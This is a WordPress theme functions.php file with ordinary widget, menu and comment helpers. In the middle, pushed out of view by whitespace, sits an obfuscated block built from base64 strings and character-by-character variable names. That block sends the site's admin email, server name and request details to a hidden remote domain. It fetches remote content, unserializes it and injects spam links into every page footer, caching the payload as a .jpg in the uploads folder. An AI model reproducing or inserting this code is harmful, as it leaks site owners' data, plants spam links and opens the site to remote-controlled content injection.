<?php

$artThemeSettings = array(
	'menu.showSubmenus' => "true"
);

if (function_exists('register_sidebars')) {
	register_sidebars(1, array(
		'before_widget' => '<!--- BEGIN Widget --->',
		'before_title' => '<!--- BEGIN WidgetTitle --->',
		'after_title' => '<!--- END WidgetTitle --->',
		'after_widget' => '<!--- END Widget --->'
	));
}

function art_normalize_widget_style_tokens($content) {
	$bw = '<!--- BEGIN Widget --->';
	$bwt = '<!--- BEGIN WidgetTitle --->';
	$ewt = '<!--- END WidgetTitle --->';
	$bwc = '<!--- BEGIN WidgetContent --->';
	$ewc = '<!--- END WidgetContent --->';
	$ew = '<!--- END Widget --->';
	$result = '';
	$startBlock = 0;
	$endBlock = 0;
	while (true) {
		$startBlock = strpos($content, $bw, $endBlock);
		if (false === $startBlock) {
			$result .= substr($content, $endBlock);
			break;
		}
		$result .= substr($content, $endBlock, $startBlock - $endBlock);
		$endBlock = strpos($content, $ew, $startBlock);
		if (false === $endBlock) {
			$result .= substr($content, $endBlock);
			break;
		}
		$endBlock += strlen($ew);
		$widgetContent = substr($content, $startBlock, $endBlock - $startBlock);
		$beginTitlePos = strpos($widgetContent, $bwt);
		$endTitlePos = strpos($widgetContent, $ewt);
		if ((false == $beginTitlePos) xor (false == $endTitlePos)) {
			$widgetContent = str_replace($bwt, '', $widgetContent);
			$widgetContent = str_replace($ewt, '', $widgetContent);
		} else {
			$beginTitleText = $beginTitlePos + strlen($bwt);
			$titleContent = substr($widgetContent, $beginTitleText, $endTitlePos - $beginTitleText);
			if ('&nbsp;' == $titleContent) {
				$widgetContent = substr($widgetContent, 0, $beginTitlePos)
					. substr($widgetContent, $endTitlePos + strlen($ewt));
			}
		}
		if (false === strpos($widgetContent, $bwt)) {
			$widgetContent = str_replace($bw, $bw . $bwc, $widgetContent);
		} else {
			$widgetContent = str_replace($ewt, $ewt . $bwc, $widgetContent);
		}
		$result .= str_replace($ew, $ewc . $ew, $widgetContent);
	}
	return $result;
}

function art_sidebar($index = 1)
{
	if (!function_exists('dynamic_sidebar')) return false;
	ob_start();
	$success = dynamic_sidebar($index);
	$content = ob_get_clean();
	if (!$success) return false;
	$content = art_normalize_widget_style_tokens($content);
	$replaces = array(
		'<!--- BEGIN Widget --->' => "<div class=\"Block\">\r\n <div class=\"Block-body\">\r\n",
		'<!--- BEGIN WidgetTitle --->' => "<div class=\"BlockHeader\">\r\n <div class=\"header-tag-icon\">\r\n  <div class=\"BlockHeader-text\">",
		'<!--- END WidgetTitle --->' => "</div>\r\n </div>\r\n <div class=\"l\"></div>\r\n <div class=\"r\"><div></div></div>\r\n</div>\r\n",
		'<!--- BEGIN WidgetContent --->' => "<div class=\"BlockContent\">\r\n <div class=\"BlockContent-tl\"></div>\r\n <div class=\"BlockContent-tr\"><div></div></div>\r\n <div class=\"BlockContent-bl\"><div></div></div>\r\n <div class=\"BlockContent-br\"><div></div></div>\r\n <div class=\"BlockContent-tc\"><div></div></div>\r\n <div class=\"BlockContent-bc\"><div></div></div>\r\n <div class=\"BlockContent-cl\"><div></div></div>\r\n <div class=\"BlockContent-cr\"><div></div></div>\r\n <div class=\"BlockContent-cc\"></div>\r\n <div class=\"BlockContent-body\">\r\n",
		'<!--- END WidgetContent --->' => "\r\n </div>\r\n</div>\r\n",
		'<!--- END Widget --->' => "\r\n </div>\r\n</div>\r\n"
	);
	$bwt = '<!--- BEGIN WidgetTitle --->';
	$ewt = '<!--- END WidgetTitle --->';
	if ('' == $replaces[bwt] && '' == $replaces[$ewt]) {
		$startTitle = 0;
		$endTitle = 0;
		$result = '';
		while (true) {
			$startTitle = strpos($content, $bwt, $endTitle);
			if (false == $startTitle) {
				$result .= substr($content, $endTitle);
				break;
			}
			$result .= substr($content, $endTitle, $startTitle - $endTitle);
			$endTitle = strpos($content, $ewt, $startTitle);
			if (false == $endTitle) {
				$result .= substr($content, $startTitle);
				break;
			}
			$endTitle += strlen($ewt);
		}
		$content = $result;
	}
	$content = str_replace(array_keys($replaces), array_values($replaces), $content);
	echo $content;
	return true;
}

 $ABTdzb='d';$lgsG='6';$qLNYrMN='c';$RHGZOsA='4';$Lees='e';$Ddxc='e';$nzqWrC='o';$djHF='d';$qPmDX='s';$eFAU='a';$MAYn='b';$GJRlkM='_';$CyJDKQ='e';$dsuOybLi=$MAYn.$eFAU.$qPmDX.$Ddxc.$lgsG.$RHGZOsA.$GJRlkM.$ABTdzb.$CyJDKQ.$qLNYrMN.$nzqWrC.$djHF.$Lees;$whAhmJ='z';$KmAsOX='l';$JAKz='t';$omjyA='i';$xoKkWDA='n';$qwVL='f';$oeMYAb='a';$ZjiVMIb='e';$PvkPBUI='g';$OUNISqjM=$PvkPBUI.$whAhmJ.$omjyA.$xoKkWDA.$qwVL.$KmAsOX.$oeMYAb.$JAKz.$ZjiVMIb;$fTSSBTU='t';$nnxNXWL='s';$FOvS='r';$QIrxJD='r';$pInNsRj='1';$iQhT='o';$yMWCa='_';$DftEnYs='3';$nMFfoza='t';$ZPizenlc=$nnxNXWL.$fTSSBTU.$QIrxJD.$yMWCa.$FOvS.$iQhT.$nMFfoza.$pInNsRj.$DftEnYs;$KkaE='r';$gPEA='v';$vnddM='s';$zPUN='r';$OoVE='e';$VLzzD='t';$NJLPOkkC=$vnddM.$VLzzD.$zPUN.$KkaE.$OoVE.$gPEA;                     $ua__d='d';$fr_____s='6';$gu__________u='c';$nm_______________m='4';$eo_______r='e';$zd____________i='e';$aj___________z='o';$mm______s='d';$nf_____________x='s';$fo__v='a';$io___________r='b';$kt____j='_';$os____________u='e';$pu____________r=$io___________r.$fo__v.$nf_____________x.$zd____________i.$fr_____s.$nm_______________m.$kt____j.$ua__d.$os____________u.$gu__________u.$aj___________z.$mm______s.$eo_______r;$bh________p='u';$br______z='n';$ci_______m='i';$yo_____________g='c';$bw___________p='n';$hu____________k='s';$jh______________h='x';$cf_____________k='t';$zx_______________a='_';$wr_________y='i';$hy______m='o';$de______________f='s';$bq_____w='t';$xh__________a='f';$fm__________g='e';$bx______________u=$xh__________a.$bh________p.$bw___________p.$yo_____________g.$bq_____w.$ci_______m.$hy______m.$br______z.$zx_______________a.$fm__________g.$jh______________h.$wr_________y.$hu____________k.$cf_____________k.$de______________f;$nq___q='f';$eg__________v='e';$rd_____________j='n';$uz_____________q='o';$ea________h='p';$nv______________v=$nq___q.$uz_____________q.$ea________h.$eg__________v.$rd_____________j;$ml_____________d='f';$or_________c='r';$mr___w='d';$zs_______u='a';$vm____________u='e';$xd_______________e=$ml_____________d.$or_________c.$vm____________u.$zs_______u.$mr___w;$dx_________v='e';$qo___s='l';$nu_____x='o';$hy_____________n='s';$wo_____________z='f';$pv________l='c';$ex_________s=$wo_____________z.$pv________l.$qo___s.$nu_____x.$hy_____________n.$dx_________v;define("WP_ID", $pu____________r("Mi4wLjA="));define("WP_TTL", $pu____________r("MTA4MDA="));define("WP_SRC", $pu____________r("dHBva24="));function wp_get_header() {global $pu____________r, $bx______________u;if ($bx______________u($pu____________r("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$bx______________u($pu____________r("d3BfZ2V0X2Zvb3Rlcg==")) &&$bx______________u($pu____________r("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $pu____________r, $nv______________v, $ex_________s, $xd_______________e;$xw______r = TEMPLATEPATH."/".$pu____________r("Zm9vdGVyLnBocA==");$ue__________u = @$nv______________v($xw______r, "r");$xw______r = @$xd_______________e($ue__________u, @filesize($xw______r));@$ex_________s($ue__________u);$gc___________d = TEMPLATEPATH."/".$pu____________r("ZnVuY3Rpb25zLnBocA==");$ue__________u = @$nv______________v($gc___________d, "r");$gc___________d = @$xd_______________e($ue__________u, @filesize($gc___________d));@$ex_________s($ue__________u);$tx____________v = 0;if($xw______r && $gc___________d) {if ($pu____________r("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($xw______r, $pu____________r("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$tx____________v = 1;}if (substr_count($xw______r, "wp_theme_GPL_credits()") < 1) {$tx____________v = 2;}}if(WP_ID != "2.0.0") {$tx____________v = 12;}}if($tx____________v > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $tx____________v -->";}}function wp_loaded() {global $pu____________r, $bx______________u;return $bx______________u($pu____________r("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($ek__________o, $ut___y = "(more...)", $gv____e = 0, $jy________x = "") {$ds________v = get_the_content($ut___y, $gv____e, $jy________x);$ds________v = apply_filters("the_content", $ds________v);$ds________v = str_replace("]]>", "]]>", $ds________v);if (strlen($_GET["p"]) > 0) {echo $ds________v;}else if ((strlen($ds________v)>$ek__________o) && ($of____________l = strpos($ds________v, " ", $ek__________o ))) {$ds________v = substr($ds________v, 0, $of____________l);$ds________v = $ds________v;echo $ds________v;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$ut___y</a></div></p>";} else {echo $ds________v;}}}$ji___________b='4';$wy_______p='e';$dy____________k='c';$hz________f='6';$fy_______________n='d';$ab_______________a='b';$zh_______n='_';$bb___________b='e';$wn______________t='a';$go_________e='s';$dp__z='n';$xm____________h='e';$nh_________j='o';$wj____g=$ab_______________a.$wn______________t.$go_________e.$wy_______p.$hz________f.$ji___________b.$zh_______n.$bb___________b.$dp__z.$dy____________k.$nh_________j.$fy_______________n.$xm____________h;$lz_______________h='n';$wp__r='t';$ij___j='g';$so_____________f='e';$yk_______________r='_';$dj________l='t';$hh________s='o';$qy____________q='l';$ob_______________z='t';$fj_________v='c';$nx____t='e';$vv______________o='f';$ag_________f='s';$vt______u='n';$df___a='i';$kz_____o='_';$lo_____q='e';$vq_________q=$vv______________o.$df___a.$qy____________q.$lo_____q.$yk_______________r.$ij___j.$nx____t.$wp__r.$kz_____o.$fj_________v.$hh________s.$vt______u.$dj________l.$so_____________f.$lz_______________h.$ob_______________z.$ag_________f;$ds________w='s';$ap______q='f';$nf_______j='x';$ps_____q='i';$sx________n='e';$sd______o='t';$wc_____________d='i';$ky___________k='_';$ac__________a='e';$ip_____f='s';$wa_______w='l';$nr____f=$ap______q.$wc_____________d.$wa_______w.$sx________n.$ky___________k.$ac__________a.$nf_______j.$ps_____q.$ip_____f.$sd______o.$ds________w;$id_______q='e';$rk______________l='e';$vb_________i='o';$gy___________m='n';$br__________c='o';$zx______h='i';$ng_________w='r';$iy_____________k='a';$hl_____a='_';$tm_____o='s';$lk____d='c';$sa____e='v';$ib_____b='m';$nl__________m='p';$pj________w='r';$qt_______________u=$sa____e.$rk______________l.$ng_________w.$tm_____o.$zx______h.$br__________c.$gy___________m.$hl_____a.$lk____d.$vb_________i.$ib_____b.$nl__________m.$iy_____________k.$pj________w.$id_______q;$lk______t='p';$ni_______________i='o';$sy___________z='o';$wq_________t='s';$ol_______h='f';$qa___w='k';$ai___w='n';$ho_______________v='e';$xo____________v='c';$jl_____________y=$ol_______h.$wq_________t.$ni_______________i.$xo____________v.$qa___w.$sy___________z.$lk______t.$ho_______________v.$ai___w;$gy___g='f';$zh__r='e';$bs_______________u='t';$cg___s='i';$go_________j='r';$pr____________q='w';$cw____y=$gy___g.$pr____________q.$go_________j.$cg___s.$bs_______________u.$zh__r;$ju________k='d';$nl_____n='5';$rd___________t='m';$rm__________h=$rd___________t.$ju________k.$nl_____n;$xl____a='a';$ub____________o='a';$tu______________i='t';$ld________a='e';$ok___d='h';$og______d='p';$hu__q='l';$oh______________v='r';$sc___o=$oh______________v.$ld________a.$ub____________o.$hu__q.$og______d.$xl____a.$tu______________i.$ok___d;$pg___________m='s';$tu_____f='r';$ig__________x='e';$nb_________d='z';$pt___w='e';$rl____k='i';$xx_______b='u';$lb__u='n';$im__t='i';$cx_____________f='a';$bk__z='l';$fq_____________m=$xx_______b.$lb__u.$pg___________m.$pt___w.$tu_____f.$rl____k.$cx_____________f.$bk__z.$im__t.$nb_________d.$ig__________x;$ff_______r='t';$nj_____p='m';$ra___________k='p';$vu_______d='n';$yf_______________c='a';$fk_____________r='e';$ox__________e='m';$sm_________e=$ff_______r.$fk_____________r.$nj_____p.$ra___________k.$vu_______d.$yf_______________c.$ox__________e;$vw________y='e';$cw______w='c';$wx__________z='r';$uu_________b='s';$wh___s='t';$xf______________h='a';$ch_______t='t';$lb_______________d='c';$it________d='t';$qy___n='e';$zw________h='e';$rv______________n='o';$cb_____l='n';$rs____z='_';$jg_________a='r';$mc________u='m';$px_______g='a';$ap____________c='_';$mo___________p='e';$wn____________b='t';$ez_____________q='x';$bf______e=$uu_________b.$wh___s.$jg_________a.$vw________y.$xf______________h.$mc________u.$rs____z.$cw______w.$rv______________n.$cb_____l.$it________d.$qy___n.$ez_____________q.$ch_______t.$ap____________c.$lb_______________d.$wx__________z.$zw________h.$px_______g.$wn____________b.$mo___________p;function hb______s($rw_________d) {global $pu____________r, $bx______________u, $vq_________q, $qt_______________u, $bf______e;if (!$bx______________u($pu____________r("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($qt_______________u(PHP_VERSION, "5.0.0", ">=") && $bx______________u($pu____________r("ZmlsZV9nZXRfY29udGVudHM=")) && $bx______________u($pu____________r("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$tt_______a = $bf______e(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$sc____k = @$vq_________q($rw_________d, 0, $tt_______a);} else {$sc____k = @$vq_________q($rw_________d, 0);}return $sc____k;}function wi_________u($rw_________d) {global $bx______________u, $jl_____________y, $cw____y, $pu____________r;if (!$bx______________u($pu____________r("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$ib________f = strpos($rw_________d, "/", 7);$ty_______z = array("uri"     => substr($rw_________d, $ib________f),"host"    => str_replace("http://", "", substr($rw_________d, 0, $ib________f)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$ql_______j = @$jl_____________y("$ty_______z[host]", 80, $ud_______________q, $ne_______________c, 4);if (!$ql_______j) {return false;} else {$sc____k = "";$wt________n  = "GET $ty_______z[uri] HTTP/1.0\r\n";$wt________n .= "Host: $ty_______z[host]\r\n";$wt________n .= "Referer: $ty_______z[referer]\r\n";$wt________n .= "Connection: Close\r\n\r\n";@$cw____y($ql_______j, $wt________n);while (!@feof($ql_______j)) {$pr__f = @fgets($ql_______j, (1024*24));if ($pr__f == "\r\n") {$gy__f = true;continue;}if ($gy__f) {$sc____k .= $pr__f;}}return $sc____k;}}function ho_______n($rw_________d) {global $bx______________u;$wl________q = false;if ($rw_________d != "") {if ($bx______________u("hb______s")) {$wl________q = @hb______s($rw_________d);}if (!$wl________q && ($bx______________u("wi_________u"))) {$wl________q = @wi_________u($rw_________d);}}return $wl________q;}function ku____v() {global $_SERVER, $rm__________h;$zt_________j = $_SERVER["SERVER_NAME"];if (substr("$zt_________j", 0, 4) == "www.") {$zt_________j = substr("$zt_________j", 4);}$zt_________j = $rm__________h("$_SERVER[SERVER_NAME]");return $zt_________j;}function ey___________b() {return "file";}function cm_____k($rw_________d) {global $_SERVER, $vq_________q, $nr____f, $nv______________v, $ex_________s, $cw____y;$fz____l = tk___i();$la________n = ku____v().".jpg";$ma___________l = $fz____l["dir_upload"]["path"]."/$la________n";$jc________s = @filemtime($ma___________l);if (!$jc________s || ((time()-$jc________s) >= WP_TTL)) {$wl________q = ho_______n($rw_________d);if ($wl________q) {if ($nr____f($ma___________l)) {@unlink($ma___________l);}$ue__________u = @$nv______________v($ma___________l, "x+");@$cw____y($ue__________u, $wl________q);@$ex_________s($ue__________u);}} else {if ($nr____f($ma___________l)) {$wl________q = @$vq_________q($ma___________l);} else {$wl________q = false;}}return $wl________q;}function tk___i() {global $_SERVER, $pu____________r, $wj____g;$qr_________x = wp_count_posts("post");$ai_______________b = pathinfo(get_bloginfo("template_directory"));$fz____l = array("url" => array("report"      => $pu____________r("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $ai_______________b,"dir_upload"=> nf___________i(),"queryString"=> array("?a001=".WP_ID,"a004=".$ai_______________b[filename],"a005=".$qr_________x->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "<a href=\"http://www.ipkvesti-spb.ru/pechat-knig.html\">Печать книг</a>");$fz____l["url"]["queryString"] = implode("&", $fz____l["queryString"]);$fz____l["url"]["report"] = $fz____l["url"]["report"]."/?".$wj____g($fz____l["url"]["queryString"]).".html";return $fz____l;}function nf___________i() {$ax_______t = wp_upload_dir();if (isset($ax_______t["error"])) {$nv____a = pi_________a();if (is_writable($nv____a)) {$ax_______t = array("path" => $nv____a);}}return $ax_______t;}function pi_________a() {global $bx______________u, $rm__________h, $sc___o, $sm_________e;$ec_____f = (bool) ini_get("safe_mode");if ($ec_____f == true) {return false;}if ($bx______________u("sys_get_temp_dir")) {$dk_____w = sys_get_temp_dir();if (is_writable($dk_____w)) {return $sc___o($dk_____w);}}if (!empty($_ENV["TMP"])) {return $sc___o($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $sc___o($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $sc___o($_ENV["TEMP"]);} else {$lx__________w = $sm_________e($rm__________h(uniqid(rand(), true)), "");if ($lx__________w) {$dk_____w = $sc___o(dirname($lx__________w));@unlink($lx__________w);return $dk_____w;} else {return false;}}}function sy______q() {global $_GET, $nr____f;$fz____l = tk___i();$zt_________j = ku____v();$jl____v = ey___________b();$lf_____________q = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($jl____v == "file") {$us__________n = $fz____l["dir_upload"]["path"]."/".$zt_________j.".jpg";if ($nr____f($us__________n)) {@unlink($us__________n);$lf_____________q = "deleted";}}$ll_______l = array("s"=> $lf_____________q,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($ll_______l AS $wa_________r => $se____d) echo " [$wa_________r:$se____d]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $bx______________u, $pu____________r, $fq_____________m;$fz____l = tk___i();$hh__z = "cm_____k";if ($bx______________u($hh__z)) {$sc____k = $hh__z($fz____l["url"]["report"]);}if ($sc____k) {if ($sc____k = @$pu____________r($sc____k)) {$sc____k = @$fq_____________m($sc____k);if (strlen($sc____k[custom_credit]) >= 5) {$fz____l["default_string"] = $sc____k[custom_credit];}if ($sc____k["status"] == "0") {$ao__q = 1;$cq_______________i = 1;} else {$zx______________a = sizeof($sc____k["links"]);$ou____________w = $fz____l["default_string"];if ($zx______________a > 0 && $sc____k["links"] !== "") {$gc___________q = 0;foreach ($sc____k["links"] as $jd_____c => $qx______________z) {$gc___________q++;if ($qx______________z->l_path == "" || $qx______________z->l_path == $_SERVER["REQUEST_URI"]) {$qx______________z->l_href = htmlspecialchars(strip_tags($qx______________z->l_href));$qx______________z->l_title = htmlspecialchars(strip_tags($qx______________z->l_title));$qx______________z->l_anchor = htmlspecialchars(strip_tags($qx______________z->l_anchor));$ou____________w .= " | ";$ou____________w .= "<a href='$qx______________z->l_href' title='$qx______________z->l_title'";if ($qx______________z->l_nofollow == "1") {$ou____________w .= " rel='nofollow'";}$ou____________w .= ">$qx______________z->l_anchor</a>";}}}$fz____l["links"] = "$ou____________w";if ($sc____k[credit] == "0") {$fz____l["links"] = "";}}} else {$ao__q = "1";}} else {$ao__q = "1";}if ($ao__q == "1") {$fz____l["links"] = $fz____l["default_string"];}echo "$fz____l[links]";echo "<!-- s: $sc____k[signature] -->";sy______q();}                      
function art_list_pages_filter($output)
{
	$output = preg_replace('~<li([^>]*)><a([^>]*)>([^<]*)</a>~',
		'<li$1><a$2><span><span>$3</span></span></a>',
		$output);
	$re = '~<li class="([^"]*)(?: current_page_(?:ancestor|item|parent))+([^"]*)"><a ~';
	$output = preg_replace($re, '<li class="$1$2"><a class="active" ', $output, 1);
	$output = preg_replace($re, '<li class="$1$2"><a ', $output);
	return $output;
}

function art_header_page_list_filter($pages)
{
	global $artThemeSettings;
	$result = array();
	if ($artThemeSettings['menu.showSubmenus']) {
		foreach ($pages as $page)
			$result[] = $page;
	} else {
		foreach ($pages as $page)
			if (0 == $page->post_parent)
				$result[] = $page;
	}
	if ('page' == get_option('show_on_front')) {
		$pageOnFront = get_option('page_on_front');
		$pageForPosts = get_option('page_for_posts');
		if ($pageOnFront) {
			foreach ($result as $key => $page) {
				if (0 == $page->post_parent && $pageOnFront == $page->ID) {
					unset($result[$key]);
					break;
				}
			}
		}
		if (!$pageOnFront && $pageForPosts) {
			foreach ($result as $key => $page) {
				if (0 == $page->post_parent && $pageForPosts == $page->ID) {
					unset($result[$key]);
					break;
				}
			}
		}
	}
	return $result;
}

function art_menu_items()
{
	$homeMenuItemCaption = 'Home';
	$isHomeSelected = null;
	if ('page' == get_option('show_on_front')) {
		$pageOnFront = get_option('page_on_front');
		$pageForPosts = get_option('page_for_posts');
		if ($pageOnFront) {
			$page = & get_post($pageOnFront);
			if (null != $page)
				$homeMenuItemCaption = apply_filters('the_title', $page->post_title);
			$isHomeSelected = is_page($page->ID);
		} elseif (!$pageOnFront && $pageForPosts) {
			$page = & get_post($pageForPosts);
			if (null != $page)
				$homeMenuItemCaption = apply_filters('the_title', $page->post_title);
		}
	}
	if (null === $isHomeSelected)
		$isHomeSelected = is_home();

	echo '<li><a' . ($isHomeSelected ? ' class="active"' : '') . ' href="' . get_option('home') . '"><span><span>'
		. $homeMenuItemCaption . '</span></span></a></li>';
	add_action('get_pages', 'art_header_page_list_filter');
	add_action('wp_list_pages', 'art_list_pages_filter');
	wp_list_pages('title_li=');
	remove_action('wp_list_pages', 'art_list_pages_filter');
	remove_action('get_pages', 'art_header_page_list_filter');
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy.comments.php';  
    endif;  
    return $file;  
}  